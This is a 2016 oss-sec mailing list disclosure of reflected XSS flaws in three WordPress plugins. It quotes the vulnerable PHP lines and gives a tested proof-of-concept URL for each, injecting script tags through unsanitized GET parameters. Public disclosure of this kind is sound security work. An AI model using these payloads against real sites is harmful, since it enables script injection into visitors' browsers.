oss-sec mailing list archives

Reflected XSS in three Wordpress plugins.

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 11 May 2016 12:28:33 -0400

Hello List,

I've manually confirmed these vulnerabilities:

Title: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/enhanced-tooltipglossary
Vulnerability:
There is a reflected XSS vulnerability in the following php code 
./enhanced-tooltipglossary/backend/views/admin_importexport.php:
19:        ?> (<?php echo $_GET['itemsnumber']; ?> items read from file)</div>
The variable itemsnumber appears to send unsanitized data back to the users browser.
DWF-2016-77246
PoC:
This is a tested exploit:
http://[target]/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=<script>alert(1)</script>&msg=imported
Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=37


Title: Reflected XSS in wordpress plugin tera-charts v1.0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/tera-charts (removed by WP)
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./tera-charts/charts/treemap.php:
52:    var data_filename = "<?php echo $_GET['fn']; ?>";
55:    var chart_userid = "<?php echo $_GET['userid']; ?>";
The variable fn appears to send unsanitized data back to the users browser.
DWF-2016-77716
PoC:
This is a tested exploit:
http://wp-site/tera-charts/charts/treemap.php?fn=";;</script><script>alert(1);</script><script>"&userid=1
Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=455


Title: Reflected XSS in wordpress plugin pondol-carousel v1.0 (no response from author)
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/pondol-carousel
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./pondol-carousel/pages/admin_create.php:
5:      var itemid      = "<?php echo $_GET["itemid"];?>";
The variable itemid appears to send unsanitized data back to the users browser.
DWF-2016-77531
PoC:
This is a tested exploit:
http://wp-sitehttp://192.168.0.115/pondol-carousel/pages/admin_create.php?itemid=";;</script><script>alert(1);</script>"
Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=524


For more information on DWF assignments see https://github.com/distributedweaknessfiling/DWF-Documentation

Current thread:

Reflected XSS in three Wordpress plugins. Larry W. Cashdollar (May 11)
- Re: Reflected XSS in three Wordpress plugins. Henri Salo (May 12)